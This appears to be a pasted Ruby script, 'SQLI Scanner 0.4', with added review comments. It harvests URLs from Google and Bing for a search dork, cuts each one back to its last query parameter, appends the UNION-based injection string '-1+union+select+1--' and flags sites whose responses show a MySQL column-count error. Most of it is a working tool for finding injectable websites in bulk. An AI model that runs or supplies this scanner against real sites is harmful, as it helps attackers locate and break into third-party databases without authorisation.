Doddy

SQLI Scanner 0.4

Jan 1st, 2015
  1. #!usr/bin/ruby
  2. #SQLI Scanner 0.4
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"
  7. require "openssl"
  8.  
  9. # Functions
  10.  
  # Fetches +web+ with a fixed desktop-Firefox User-Agent and returns the
  # response body.
  #
  # Every StandardError raised along the way is swallowed and the literal
  # string "Error" is returned instead, so a caller cannot tell a failed
  # request from a page whose body happens to be "Error".
  #
  # NOTE(review): the request goes through Kernel#open, which has
  # historically treated a string starting with "|" as a command to spawn.
  # The values passed in by this script are built from hrefs scraped out of
  # search-result HTML, i.e. untrusted input.
  #
  # @param web [String] URL to request
  # @return [String] response body, or "Error" on any failure
  def toma(web)
    open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    "Error"
  end
  18.  
  19.  
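  # Performs a GET over TLS against +web+ and returns the response body.
  #
  # Unlike toma and tomar there is no rescue here: a parse, connection or TLS
  # failure propagates to the caller as an exception.
  #
  # The User-Agent sent by this function ends in "Firefox/20.0", while the
  # other fetch helpers in this file send "Firefox/25.0"; the mismatch is kept
  # as written.
  #
  # @param web [String] absolute https URL
  # @return [String] response body
  def toma_ssl(web)
    uri = URI.parse(web)
    nave = Net::HTTP.new(uri.host, uri.port)
    nave.use_ssl = true
    # Verify the server certificate. The previous VERIFY_NONE setting accepted
    # any certificate, so whoever sat on the network path could substitute the
    # HTML that the callers go on to parse for links.
    nave.verify_mode = OpenSSL::SSL::VERIFY_PEER
    nave.get(uri.request_uri, {"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
  end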
  27.  
  28.  
  # Sends +arg+ as the body of a POST to +web+ and returns the response body.
  #
  # Only the path component of +web+ is put on the request line (the query
  # string is not sent), and use_ssl is never enabled on the connection.
  # Any StandardError is swallowed and the literal string "Error" is returned.
  #
  # NOTE(review): nothing in the visible listing calls this function.
  #
  # @param web [String] target URL
  # @param arg [String] request body
  # @return [String] response body, or "Error" on any failure
  def tomar(web, arg)
    target = URI(web)
    request_headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  39.  
  # Reduces each URL to everything up to and including its last "=".
  #
  # +pages+ is flattened first, so nested arrays are accepted. Entries that
  # contain no "=" are dropped. The match is greedy, which means the cut is
  # made at the last "=" on the matched line: the value of the final query
  # parameter is removed and the parameter name is kept. Duplicates are not
  # removed here.
  #
  # @param pages [Array<String>, Array<Array<String>>] URLs to trim
  # @return [Array<String>] trimmed URLs, each ending in "="
  def cortar(pages)
    pages.flatten.each_with_object([]) do |url, trimmed|
      prefix = url[/(.*)=(.*)/, 1]
      trimmed << (prefix + "=") if prefix
    end
  end
  53.  
  54.  
  # Collects result links from Google search pages for +dork+.
  #
  # The first space in +dork+ is replaced by "+" (String#sub, so only the
  # first one). One request is made per element of the string range
  # "1"..pages, with the start parameter advancing 10, 20, 30, ... Each page
  # is fetched through toma_ssl, hrefs are pulled out with a fixed regular
  # expression, and for every href of the form url?q=...&amp;sa the captured
  # part is URI-decoded and kept.
  #
  # @param dork [String] search query
  # @param pages [String] upper bound of the page range, as given on the
  #   command line
  # @return [Array<String>] de-duplicated result URLs
  def google(dork, pages)
    query = dork.sub(/ /,"+")
    found = []
    offset = 0
    ("1"..pages).each do
      offset += 10
      html = toma_ssl("https://www.google.com.ar/search?hl=&q=" + query + "&start=" + offset.to_s)
      html.scan(/(?<="r"><. href=")(.+?)"/).flatten.each do |href|
        # Only redirect-style hrefs carry the real destination.
        next unless href =~ /url\?q=(.*)&amp;sa/
        found.push(URI::decode($1))
      end
    end
    found.uniq
  end
  76.  
  # Fallback link collector for Google: takes hosts out of "cache:" links.
  #
  # Uses the same query handling and paging as google (first space replaced
  # by "+", one toma_ssl request per element of "1"..pages, start advancing
  # by 10). Every URI found in the returned HTML by URI::extract is checked
  # for the pattern cache:<id>:<target>+ and the target is rebuilt as
  # "http://" + target, then URI-decoded.
  #
  # @param dork [String] search query
  # @param pages [String] upper bound of the page range, as given on the
  #   command line
  # @return [Array<String>] de-duplicated URLs, all with an http:// prefix
  def google_recursive(dork, pages)
    query = dork.sub(/ /,"+")
    collected = []
    offset = 0
    ("1"..pages).each do
      offset += 10
      html = toma_ssl("https://www.google.com.ar/search?hl=&q="+query+"&start="+offset.to_s)
      URI::extract(html).each do |candidate|
        next unless candidate =~ /cache:(.*?):(.*?)\+/
        collected.push(URI::decode("http://"+$2))
      end
    end
    collected.uniq
  end
  97.  
  # Collects result links from Bing search pages for +dork+.
  #
  # The first space in +dork+ is replaced by "+". One plain-HTTP request is
  # made through toma per element of the string range "1"..pages, with the
  # first parameter advancing 10, 20, 30, ... Hrefs are taken from anchors
  # that directly follow an <h2> and then from those following an <h3>;
  # each is URI-decoded and kept unless it points at 778802.r.msn.com.
  #
  # When toma fails it returns the string "Error", which simply yields no
  # matches for that page.
  #
  # @param dork [String] search query
  # @param pages [String] upper bound of the page range, as given on the
  #   command line
  # @return [Array<String>] de-duplicated result URLs
  def bing(dork, pages)
    query = dork.sub(/ /,"+")
    collected = []
    offset = 0
    ("1"..pages).each do
      offset += 10
      html = toma("http://www.bing.com/search?q=" + query + "&first=" + offset.to_s)
      # Same filtering for both heading levels, h2 results first.
      [/<h2><a href="(.*?)" h/, /<h3><a href="(.*?)" h/].each do |pattern|
        html.scan(pattern).flatten.each do |href|
          decoded = URI::decode(href)
          next if decoded =~ /http:\/\/778802\.r\.msn\.com\//
          collected.push(decoded)
        end
      end
    end
    collected.uniq
  end
  129.  
  # Prints the command-line usage text (syntax, the four options and one
  # example invocation) to standard output.
  #
  # @return [nil]
  def uso
    print(
      "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n",
      "-search_bing : Find in Bing\n",
      "-search_google : Find in Google\n",
      "-scan_bing : Find SQLI in Bing\n",
      "-scan_google : Find SQLI in Google\n",
      "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
    )
  end
  138.  
  # Prints the program banner to standard output.
  #
  # @return [nil]
  def head
    $stdout.print("\n\n-- == SQLI Scanner 0.4 == --\n\n")
  end
  142.  
  # Prints the closing copyright line to standard output.
  #
  # @return [nil]
  def copyright
    $stdout.print("\n\n-- == (C) Doddy Hackman 2015 == --\n\n")
  end
  146.  
  # Command-line driver: <option> <dork> <pages>.
  #
  # -search_* only lists the links a search engine returns. -scan_* trims
  # each link with cortar and then requests it once through toma with a
  # fixed suffix appended, reporting [OK] when the response body contains
  # one specific database error message and [FAIL] otherwise.
  #
  # What this looks like from the server side, for log review: a GET whose
  # final query parameter value is replaced by the constant suffix below,
  # sent with the constant User-Agent string set in toma. The [OK] verdict
  # depends entirely on the application echoing the database error text into
  # the response; parameterised queries and generic error pages remove that
  # signal.
  opcion, dork, pages = ARGV

  head

  # Sends the single probe request per candidate and prints the verdict.
  probe = lambda do |candidates|
    candidates.flatten.each do |base|
      print "[+] Link : "+base
      begin
        body = toma(base + "-1+union+select+1--")
        if body =~ /The used SELECT statements have a different number of columns/
          print " [OK]\n\a\a"
        else
          print " [FAIL]\n"
        end
      rescue
        print " [FAIL]\n"
      end
    end
  end

  if opcion.nil? || dork.nil? || pages.nil?
    uso
  else
    case opcion
    when "-search_bing"
      print "\n[+] Searching in Bing ...\n\n"

      results = bing(dork, pages)

      print "[+] Pages Count : "+results.count.to_s+"\n\n"
      print "[-] Links not found\n" if results.empty?

      results.flatten.each { |result| print "[+] Link : "+result+"\n" }

      print "\n[+] Finished\n"

    when "-search_google"
      print "\n[+] Searching in Google ...\n\n"

      results = google(dork, pages)

      # Second attempt through the cache-link extractor when nothing matched.
      if results.empty?
        print "[+] Searching in Google again ...\n\n"
        results = google_recursive(dork, pages)
      end

      # No trailing newline on the next two messages, as in the original.
      print "[+] Pages Count : "+results.count.to_s
      print "[-] Links not found" if results.empty?

      results.flatten.each { |result| print "[+] Link : "+result+"\n" }

      print "\n[+] Finished\n"

    when "-scan_bing"
      print "\n[+] Searching in Bing ...\n\n"

      results = cortar(bing(dork, pages))

      print "[+] Pages Count : "+results.count.to_s+"\n\n"
      print "[-] Links not found\n" if results.empty?

      probe.call(results)

      print "\n[+] Finished\n"

    when "-scan_google"
      print "\n[+] Searching in Google ...\n\n"

      results = cortar(google(dork, pages))

      if results.empty?
        print "[+] Searching in Google again ...\n\n"
        results = cortar(google_recursive(dork, pages))
      end

      print "[+] Pages Count : "+results.count.to_s+"\n\n"
      # No trailing newline here, as in the original.
      print "[-] Links not found" if results.empty?

      probe.call(results)

      print "\n[+] Finished\n"
    else
      print "[-] Bad Option"
    end
  end

  copyright
  264.  
  265.  
  266. #The End ?